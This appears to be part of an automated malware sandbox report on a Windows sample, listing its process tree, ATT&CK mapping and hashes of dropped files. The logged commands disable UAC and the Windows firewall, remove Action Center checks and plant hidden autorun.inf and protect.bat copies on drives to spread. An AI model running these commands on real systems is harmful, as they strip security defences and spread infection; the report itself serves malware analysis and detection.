C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c NET START seclogon4⤵
-
C:\Windows\SysWOW64\net.exeNET START seclogon5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START seclogon6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config upnphost start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config upnphost start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config SSDPSRV start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config SSDPSRV start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc config browser start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config browser start= auto5⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start upnphost4⤵
-
C:\Windows\SysWOW64\net.exenet start upnphost5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start SSDPSRV4⤵
-
C:\Windows\SysWOW64\net.exenet start SSDPSRV5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net start browser4⤵
-
C:\Windows\SysWOW64\net.exenet start browser5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start browser6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
- Modifies firewall policy service
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl" /v FEATURE_WEBOC_POPUPMANAGEMENT /t REG_DWORD /d 0 /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_FullURL /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_StatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\Main" /v Show_URLinStatusBar /t REG_SZ /d yes /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKLM\Software\Microsoft\Internet Explorer\MINIE" /v ShowStatusBar /t REG_DWORD /d 1 /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg DELETE "HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Default" /f5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "DisableFirstRunCustomize" /t REG_DWORD /d "1" /f5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe"4⤵
-
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"4⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops autorun.inf file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon5⤵
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT6⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"6⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"4⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\autorun.inf"3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\autorun.inf"3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "C:\protect.bat"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -R -H "F:\protect.bat"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "C:\protect.bat"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"2⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +R +H "F:\protect.bat"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify System Firewall
2Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
256KB
MD5adbd8353954edbe5e0620c5bdcad4363
SHA1aeb5c03e8c1b8bc5d55683ea113e6ce1be7ac6e6
SHA25664eff10c4e866930d32d4d82cc88ec0e6f851ac49164122cae1b27eb3c9d9d55
SHA51287bf4a2dc4dd5c833d96f3f5cb0b607796414ffee36d5c167a75644bcbb02ab5159aa4aa093ed43abe290481abc01944885c68b1755d9b2c4c583fcccd041fd2
-
Filesize
1024KB
MD51906dfe77280bbd525e2391db0f09087
SHA1cc29ec2e63c536bb97151e59c5b1bb4c0ac7009b
SHA256c22574fe36609bb5a57bc718c9ab4fc93cacfaf522fad2e18b752921a2ce9b98
SHA512edd4fcebb5c1f78e51bca012d5bdc99e52c38e0aefc9a76ef5e1d97e82c10f1411d9fa9cf2bcfda2fcc1f407d2cdd72a36485aa83aa5411875f2ad1b62d89591
-
Filesize
68KB
MD5cbab3970a1a39afd96811e2ed6e10551
SHA1c8c45fc2e9b37c952289b9ce892cde58cdf216cc
SHA25681bffc41ae4367f90876e0570ccc3ef354c8541a63aa45a5d9c22dd902f13405
SHA51215949bca3e351982f8bcac97a8c4a0e9730f70a2fac13779ff38a20d04cb29de7c10601d7c276aa618e0ddc7e0a9ebf39222d9f47250c663f384eeb3d3fa8e0d
-
Filesize
498B
MD590be2701c8112bebc6bd58a7de19846e
SHA1a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
1KB
MD5b659f1a4d2a75ac854bc59ee0df8f269
SHA1b2df30a1741e4e63ff20e951a9206a6471621a83
SHA25668b89269e0d9eac8c9541e056e761b596d76357ec77f567d98eacea95ae5cf6e
SHA5122328cd12dad266269453fb2d93ab94ab9f269365a7c30fb258e827d96638b72cd7dc69c3351aacd7fa538a5e98b84ba58d417cd4f7c2182271979b506c6a3ca1
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
25KB
MD5212ddd77efd824768ef4988e5ace6cce
SHA1a4075151428b170d8413960d948165ef501871dd
SHA256c301e161d731d051c30e1b66c8cd9dd1fde1f5fac84895aa55c527bbed92dc41
SHA5127b17253f1c8f37c68e00cf6830c1a62c5fd6617a22c5594ecc76787bef26f0d4632a1a5f3ded86b225ca9270d314f2465037e0c06597e19b3ecd90ab544d896f
-
Filesize
219B
MD53676ba592a32bb9434599226129d6825
SHA18f0612c1bcd02447b2e71268f704fed6d8b94e18
SHA256416ae91ed63c27575f531034919192d8f5263c525c05a775d0948c55f5b43437
SHA51239033c35de4d495584e2d8be606f58e5a07acb4c6f426a757a9f16c1b1ff8015fc9898aee8acd12aa5b768dfdff49e510f4573d48cb2ab08b13b7f2d2eb8a813
-
Filesize
34KB
MD55a630ca16e715633272d3994d4cfe79d
SHA1bc3f62845989685321dfdf568c338103d3fa1e8c
SHA2569a081ff2756d1b9b08538402a2f40b69f86d51b0a305f6d2c2ff29a0496f837e
SHA5120c75b1cff44bf25d234ab072d8dbc488c67bf3610a9be2d1b58c49ede29bf092d015cc79f62545043abdcc3e5aa3798149d40b8210d274c9743bf3b24a36262e
-
Filesize
535B
MD59cac34f332cf836e17fc2f2fa2bb71e4
SHA1d18afa52aeb5e2aa2c6d42bba50a0f7c9910dfb8
SHA256a1454355e66bc7f6d45301b83b1bbfd8b6aa5fd8c53c283f3ae10aba3d8950a7
SHA512b9ab7e6f465c6bcdfca25cd5e3f169771106e70cde4e946d887efc2676558b07eab1a0626b998406262f191f63e782a1a43bcf1e0654a1d7d98995deac534a1b
-
Filesize
441B
MD5fa19559081b4ab5f084f93e66a9d42be
SHA18359e8bfe26390bb9bf36a553d0a59c0db711007
SHA256b23940134fec85d6d0fa7e02e737a9e1ec046a05714b190fb4e70e97b96b989b
SHA512345427a14b9544b8f811017363f8ca9a9f30be2783b7aeb0a1f145c3eadbe73fda7e20276087d4e0cbabd6dff9898ea49cbb23fca5f0875ef1dfc348822102cd
-
Filesize
8KB
MD5d186b58050ce0ec5d862397b481c64e2
SHA16e9a2e459640029e3faeca4cc0d27494c7401d12
SHA256c045027d3f2655a999a4419fb1cf4cfce02c920d9fd019cef65287040eef9aa4
SHA5123e165b242a196ed3ed74aee030add9faf1848756f330b98ff2fd8aca00fb7114e67ecc060c444145a80b995b3ab0958125cb10565d6c7ed0b214e0f31d820d79
-
Filesize
315KB
MD52590fd6e112931b0defac0686d5c268e
SHA1cb0663525cc8286d9cba4fa642ca12de55eb9155
SHA25666244c2be9f38702ccb106a5e2e43114f9e113d6ebe2d474e74181afb1490377
SHA5128d41b9e75d8d9424c7452a4449fadf23117b0de04855679df14ef744f1417850ed8a3831750310ae42d1f932249cc1a6d607be046eceb6ed0cd82e065f306374
-
Filesize
191KB
MD511115f56c2ed3c465cb00b2d70281aaf
SHA1a42e36c46bc69a1ce9bb87ef97c262f2d0ac0cb7
SHA256af12acbb0d9e9d74a3f0fa0cd9483020592e277ce5392ec9521e79957043074d
SHA5124caa106ee5008a35350af729ce53f1568df7c9658af6b0dda6e2678a37d33cbf1e460269b94495624b44c0ad4e3fb9c098fb5b346241eedf2819aedf0ad758c6
-
Filesize
63B
MD5f64baf418f685884efec59a9d80bc5f6
SHA19c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9
SHA2564b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f
SHA512dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69
-
Filesize
376KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB